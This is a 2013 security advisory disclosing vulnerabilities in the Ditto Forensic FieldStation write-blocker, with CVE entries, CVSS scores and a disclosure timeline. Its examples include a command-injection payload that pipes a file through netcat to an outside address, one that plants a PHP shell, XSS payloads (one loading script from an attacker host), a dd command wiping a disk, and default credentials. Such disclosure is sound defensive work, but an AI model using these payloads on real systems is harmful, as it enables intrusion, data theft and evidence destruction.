228 lines
No EOL
8.8 KiB
Text
Executable file
228 lines
No EOL
8.8 KiB
Text
Executable file
**************************************************************
|
||
Title: Ditto Forensic FieldStation, multiple vulnerabilities
|
||
Versions affected: <= 2013Oct15a (all)
|
||
Vendor: CRU Wiebetech
|
||
Discovered by: Martin Wundram
|
||
Email: wundram@digitrace.de
|
||
Date found: 2013-04-22
|
||
Date published: 2013-12-12
|
||
Status: partially patched
|
||
**************************************************************
|
||
|
||
|
||
0] ======== Introduction / Background / Impact ========
|
||
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
|
||
essential requirement is that evidence data does not get modified at all (or
|
||
not unnoticed, at least). Therefore IT forensic experts use write-blockers to
|
||
ensure a read-only access to evidence data like hard disks or USB mass
|
||
storage.
|
||
|
||
The Ditto Forensic FieldStation is such a special equipment (hardware with
|
||
embedded software) used by forensic experts to analyse and copy evidence data
|
||
in a safe and secure way. The ditto is explicitly marketed as a device to
|
||
acquire data from network file shares, too. This means it is meant to be
|
||
connected to possibly hostile networks of suspects.
|
||
|
||
However it was found to be vulnerable up to the point of not being reliable as
|
||
a computer forensic device.
|
||
|
||
|
||
1] ======== OS Command Injection ========
|
||
Class: Command Injection [CWE-77]
|
||
Impact: Code execution
|
||
Remotely Exploitable: Yes
|
||
CVE Name: CVE-2013-6881
|
||
CVSS v2 Base Score: 10
|
||
Overall CVSS v2 Score: 9.2
|
||
CVSS v2 Vector:
|
||
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
|
||
|
||
Several input fields of the web application are vulnerable to OS command
|
||
injection. E.g. the application allows the setting of parameters like 'sector
|
||
size' or 'skip count' for a forensic imaging task. Because of improper
|
||
neutralization in combination with the web server running with root
|
||
privileges, an attacker is able to access and manipulate the complete system.
|
||
|
||
Example 1 (setting of 'sector size' = 1 with malicious content):
|
||
|
||
1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;
|
||
|
||
Example 2 (setting of 'set-size' = 1 with copying a PHP shell from
|
||
the external SD card):
|
||
|
||
1;cp /ditto/shell.php /opt/web/htdocs;
|
||
|
||
|
||
2] ======== Persistent XSS ========
|
||
Class: Cross-site Scripting [CWE-79]
|
||
Impact: Code execution
|
||
Remotely Exploitable: Yes
|
||
Status: unpatched
|
||
CVE Name: CVE-2013-6882
|
||
CVSS v2 Base Score: 9
|
||
Overall CVSS v2 Score (if patched): 9.2
|
||
CVSS v2 Vector:
|
||
(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
|
||
Overall CVSS v2 Score (unpatched): 10
|
||
|
||
The web application suffers from multiple vulnerabilities regarding XSS. The
|
||
first one (a) is critical because an unauthorized attacker is able to push
|
||
malicious code into the system and consequently attacking every user. The
|
||
other ones (b) need authentication first.
|
||
|
||
a) The web application logs every login (including the username) in a not
|
||
sanitized way to a system log. Additionally, the web application embeds that
|
||
system log rendered as HTML into the start page of every user who successfully
|
||
logs in. Thus an unprivileged attacker can persistently inject malicious code
|
||
which attacks all users of the vulnerable system immediately after their
|
||
login.
|
||
|
||
Example:
|
||
|
||
POSTDATA=
|
||
user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
|
||
&pass=demo&login=Log+In
|
||
|
||
|
||
b) It is easily possible to submit malicious data as input into multiple HTML
|
||
form fields (e.g. one can force the system to load externally hosted
|
||
JavaScript code with <script src=http://www.hacker.tld/code.js></script>).
|
||
This can result in dangerous situations where the (external) JavaScript code
|
||
mangles the information displayed about important computer forensic key values
|
||
whose integrity is crucial.
|
||
|
||
Example:
|
||
784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",
|
||
"verify actions: yes" instead of "no", ...
|
||
|
||
|
||
3] ======== Cross-Site Request Forgery ========
|
||
Class: Cross-Site Request Forgery [CWE-352]
|
||
Impact: Application misuse
|
||
Remotely Exploitable: Yes
|
||
CVE Name: CVE-2013-6883
|
||
CVSS v2 Base Score: 6.6
|
||
Overall CVSS v2 Score: 8
|
||
CVSS v2 Vector:
|
||
(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
|
||
|
||
The web application is vulnerable to attacks using Cross-Site Request Forgery.
|
||
E.g. the disk erase technique (correct settings are important for the reliable
|
||
deletion of sensitive forensic data) can be changed with a simple POST
|
||
request.
|
||
|
||
|
||
4] ======== Misconfigured Daemon Rights ========
|
||
Class: Configuration [CWE-16]
|
||
Impact: Full system access
|
||
|
||
The web server lighthttpd and the PHP engine are run as user 'root'. Thus
|
||
injection weaknesses in the 'ditto' web application result in immediate full
|
||
system access.
|
||
|
||
|
||
5] ======== Unneeded Daemons/Software ========
|
||
Class: Configuration [CWE-16]
|
||
Impact: Attackable services
|
||
Best matching CCE-ID: CCE-4268-9
|
||
|
||
Forensic usage needs only write-blocking and imaging of evidence data.
|
||
However, the base system contains further active software and services. This
|
||
helps attacking the system and escalating privileges. The tools/daemons are
|
||
especially netcat and an active SSHd. Furthermore, the SSHd binds to the
|
||
network port which is labeled as 'source' and thus intended for usage in
|
||
supposedly hostile network environments - the network containing evidence data
|
||
from suspects.
|
||
|
||
|
||
6] ======== Use of standard credentials ========
|
||
Class: Use of Hard-coded Credentials [CWE-798]
|
||
Impact: unwanted full system access
|
||
Remotely Exploitable: Yes
|
||
CVE Name: CVE-2013-6884
|
||
CVSS v2 Base Score: 10
|
||
Overall CVSS v2 Score: 9.2
|
||
CVSS v2 Vector:
|
||
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
|
||
|
||
The ditto write-blocker contains a default system user named 'ditto' with the
|
||
default password 'ditto' which is allowed to elevate its user rights to root
|
||
(sudo) without further authentication. In combination with the active SSHd,
|
||
this vulnerability allows attackers full access to the ditto if it gets
|
||
connected to the same/reachable network.
|
||
|
||
|
||
7] ======== Misconfigured Core System ========
|
||
Class: Configuration [CWE-16]
|
||
Impact: Alteration of evidence data
|
||
Remotely Exploitable: Yes
|
||
|
||
Although explicitly marketed as a hardware write-blocker, the ditto does not
|
||
implement any specific write-blocking mechanism at all. The underlying system
|
||
is able to manipulate or even erase evidence on devices which are connected to
|
||
the 'source side' of the ditto. The problem is: no hardware-level, no driver-
|
||
level and no kernel-level (blockdev) write-blocking are implemented. Only the
|
||
web application prevents the user from writing to the source media. That is
|
||
just security by obscurity. Finally, every critical weakness or simple
|
||
malfunction in the web application can potentiallly lead to overwriting of
|
||
source/evidence data.
|
||
|
||
Furthermore, the embedded Linux system itself mounts the system partition as
|
||
writable. Thus malware could be persistently deployed!
|
||
|
||
Example:
|
||
One can simply overwrite supposedly write-protected source data (USB stick
|
||
and
|
||
SATA disk) with
|
||
dd if=/dev/zero of=/dev/sda.
|
||
|
||
|
||
8] ======== Solution ========
|
||
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't
|
||
connect the device to potentially hostile networks. Examine your device if it
|
||
has been manipulated at an earlier time (has someone placed a backdoor in the
|
||
embedded Linux, or a malware which silently manipulates evidence data or
|
||
copies of evidence data?).
|
||
|
||
|
||
9] ======== Report Timeline ========
|
||
2013-04-22 Discovery of vulnerabilities
|
||
2013-04-23 First contact with vendor including agreement about later public
|
||
disclosure
|
||
2013-04-26 Detailed information about vulnerabilities provided to vendor
|
||
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
|
||
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
|
||
2013-11-26 Information with details provided to vendor about upcoming public
|
||
disclosure. Vendor gave feedback regarding technical accuracy of
|
||
this report
|
||
2013-12-12 Public disclosure
|
||
|
||
|
||
10] ======== Discussion ========
|
||
Because integrity is of utmost importance during the forensic process (correct
|
||
handling of evidence data and correct deduction of conclusions and
|
||
implications), even small vulnerabilities in forensic tools and devices become
|
||
critical.
|
||
|
||
|
||
11] ======== References ========
|
||
a)
|
||
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
|
||
updates/ditto-firmware-release-notes-2013oct15a/
|
||
b)
|
||
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
|
||
updates/ditto-firmware-release-notes-2013jun30a/
|
||
|
||
|
||
--
|
||
Diplom-Wirtschaftsinformatiker Martin G. Wundram
|
||
|
||
DigiTrace GmbH - Kompetenz in IT-Forensik
|
||
Gesch<EFBFBD>ftsf<EFBFBD>hrer: Alexander Sigel, Martin Wundram
|
||
Registergericht K<>ln, HR B 72919
|
||
USt-IdNr: DE278529699
|
||
|
||
Zollstockg<EFBFBD>rtel 59, 50969 K<>ln
|
||
Telefon: 0221-6 77 86 95-0
|
||
Website: www.DigiTrace.de
|
||
E-Mail: info@DigiTrace.de |